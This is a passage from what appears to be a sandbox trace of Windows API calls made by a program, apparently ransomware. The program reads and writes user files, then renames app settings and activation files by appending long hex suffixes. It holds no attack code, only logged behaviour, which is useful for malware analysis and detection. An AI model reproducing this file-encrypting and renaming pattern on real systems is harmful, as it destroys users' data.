ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.028] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".DE869C283B0A048E1A2C8C1DA465741699F8A773BB2365AB25B4FE6F40CC8558" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat.DE869C283B0A048E1A2C8C1DA465741699F8A773BB2365AB25B4FE6F40CC8558") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\Settings\\settings.dat.DE869C283B0A048E1A2C8C1DA465741699F8A773BB2365AB25B4FE6F40CC8558" [0121.028] GetProcessHeap () returned 0x600000 [0121.028] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x314b1e0 [0121.028] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x314b1e0, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0121.029] CloseHandle (hObject=0x324) returned 1 [0121.029] GetProcessHeap () returned 0x600000 [0121.029] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.030] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.071] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.080] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.081] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.084] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.084] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.084] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".7B24FA91FDA06AB172C91DEAAEDED0CDBD0B7B9DA8777124D7627A3A833E6C51" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.7B24FA91FDA06AB172C91DEAAEDED0CDBD0B7B9DA8777124D7627A3A833E6C51") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Microsoft.ZuneMusic_3.6.13251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.7B24FA91FDA06AB172C91DEAAEDED0CDBD0B7B9DA8777124D7627A3A833E6C51" [0121.084] GetProcessHeap () returned 0x600000 [0121.085] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x208) returned 0x63e718 [0121.085] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x63e718, Length=0x208, FileInformationClass=0xa) returned 0x0 [0121.092] CloseHandle (hObject=0x31c) returned 1 [0121.092] GetProcessHeap () returned 0x600000 [0121.093] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.093] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.108] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.108] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.109] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.109] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".3D37CFB639B5278D134D1937EAA53CA99A6223BB7E061289BECA91E560E5E651" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.3D37CFB639B5278D134D1937EAA53CA99A6223BB7E061289BECA91E560E5E651") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ZuneMusic_8wekyb3d8bbwe\\Settings\\settings.dat.3D37CFB639B5278D134D1937EAA53CA99A6223BB7E061289BECA91E560E5E651" [0121.109] GetProcessHeap () returned 0x600000 [0121.109] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x6b2608 [0121.109] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x6b2608, Length=0x186, FileInformationClass=0xa) returned 0x0 [0121.111] CloseHandle (hObject=0x31c) returned 1 [0121.111] GetProcessHeap () returned 0x600000 [0121.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.111] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.191] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.191] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.192] WriteFile (in: hFile=0x31c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0121.198] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.285] ReadFile (in: hFile=0x338, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0121.286] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.288] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0121.288] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".F4CAA83A7BA5FA8BD5BCAE63A80AFC00B00CEC48DFC55104313F0E6A24961D1F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.F4CAA83A7BA5FA8BD5BCAE63A80AFC00B00CEC48DFC55104313F0E6A24961D1F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\Windows.ContactSupport_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.F4CAA83A7BA5FA8BD5BCAE63A80AFC00B00CEC48DFC55104313F0E6A24961D1F" [0121.288] GetProcessHeap () returned 0x600000 [0121.288] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x22c) returned 0x62e9b8 [0121.288] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x25fff60, FileInformation=0x62e9b8, Length=0x22c, FileInformationClass=0xa) returned 0x0 [0121.289] CloseHandle (hObject=0x338) returned 1 [0121.290] GetProcessHeap () returned 0x600000 [0121.290] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0121.291] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.324] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.324] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.326] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.326] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".B26C6FC6A6C9BBB95405C39874400C857EDAA033F3C31DD2DB3EE480B5A5BD0B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.B26C6FC6A6C9BBB95405C39874400C857EDAA033F3C31DD2DB3EE480B5A5BD0B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.B26C6FC6A6C9BBB95405C39874400C857EDAA033F3C31DD2DB3EE480B5A5BD0B" [0121.326] GetProcessHeap () returned 0x600000 [0121.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x314fd08 [0121.326] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x314fd08, Length=0x186, FileInformationClass=0xa) returned 0x0 [0121.327] CloseHandle (hObject=0x31c) returned 1 [0121.328] GetProcessHeap () returned 0x600000 [0121.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.329] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.755] ReadFile (in: hFile=0x338, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.755] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.756] WriteFile (in: hFile=0x338, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0121.757] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.758] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.758] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".374FBA3CDDA34E969BB4FB5E2DF5089CA2D278292D9ADC6F64893090FFBF1974" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.374FBA3CDDA34E969BB4FB5E2DF5089CA2D278292D9ADC6F64893090FFBF1974") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\Settings\\settings.dat.374FBA3CDDA34E969BB4FB5E2DF5089CA2D278292D9ADC6F64893090FFBF1974" [0121.758] GetProcessHeap () returned 0x600000 [0121.758] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19a) returned 0x314bf20 [0121.759] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x25fff60, FileInformation=0x314bf20, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0121.760] CloseHandle (hObject=0x338) returned 1 [0121.760] GetProcessHeap () returned 0x600000 [0121.760] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.762] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.790] ReadFile (in: hFile=0x338, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.790] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.794] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.794] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".80FBACA4C31211BA32531A12506470FBBCF14950E6A02DC31D2704E6C226561B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.80FBACA4C31211BA32531A12506470FBBCF14950E6A02DC31D2704E6C226561B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.MiracastView_cw5n1h2txyewy\\Settings\\settings.dat.80FBACA4C31211BA32531A12506470FBBCF14950E6A02DC31D2704E6C226561B" [0121.794] GetProcessHeap () returned 0x600000 [0121.794] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x188) returned 0x31501d0 [0121.794] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x25fff60, FileInformation=0x31501d0, Length=0x188, FileInformationClass=0xa) returned 0x0 [0121.795] CloseHandle (hObject=0x338) returned 1 [0121.796] GetProcessHeap () returned 0x600000 [0121.796] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.796] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.829] ReadFile (in: hFile=0x31c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.829] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.835] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.835] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".4A0018B6EE0BC957374378E24BAF1EAC89D2227393921743A7E75D7142F42112" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.4A0018B6EE0BC957374378E24BAF1EAC89D2227393921743A7E75D7142F42112") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.4A0018B6EE0BC957374378E24BAF1EAC89D2227393921743A7E75D7142F42112" [0121.835] GetProcessHeap () returned 0x600000 [0121.835] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x314f048 [0121.835] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x25fff60, FileInformation=0x314f048, Length=0x186, FileInformationClass=0xa) returned 0x0 [0121.836] CloseHandle (hObject=0x31c) returned 1 [0121.836] GetProcessHeap () returned 0x600000 [0121.836] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.837] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.874] ReadFile (in: hFile=0x338, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.875] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.875] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.876] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat", lpString2=".1D09548430173869099086869B0D4F4F8EDB458574438029EAAF292F52841B22" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat.1D09548430173869099086869B0D4F4F8EDB458574438029EAAF292F52841B22") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Settings\\settings.dat.1D09548430173869099086869B0D4F4F8EDB458574438029EAAF292F52841B22" [0121.876] GetProcessHeap () returned 0x600000 [0121.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x314f6a8 [0121.876] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x25fff60, FileInformation=0x314f6a8, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0121.877] CloseHandle (hObject=0x338) returned 1 [0121.879] GetProcessHeap () returned 0x600000 [0121.879] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.880] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.914] ReadFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.915] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.916] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0121.916] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat", lpString2=".DA9E6E978F188D3C095F02112C171E9ACA80A92CBA6D858B22D09034CC6DE92C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.DA9E6E978F188D3C095F02112C171E9ACA80A92CBA6D858B22D09034CC6DE92C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.DA9E6E978F188D3C095F02112C171E9ACA80A92CBA6D858B22D09034CC6DE92C" [0121.917] GetProcessHeap () returned 0x600000 [0121.917] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x222) returned 0x3105ff0 [0121.917] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x3105ff0, Length=0x222, FileInformationClass=0xa) returned 0x0 [0121.918] CloseHandle (hObject=0x320) returned 1 [0121.918] GetProcessHeap () returned 0x600000 [0121.918] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0121.920] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.989] ReadFile (in: hFile=0x214, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0121.990] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0121.996] WriteFile (in: hFile=0x338, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0121.996] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0122.002] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x25fff70) returned 0x0 [0122.002] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\a73NzFugbk4hbW 2bt2.wav", lpString2=".983D854A09D7D2E94BA5AC31010B40AC5CE27566FEAA99EF8383B90D80536E70" | out: 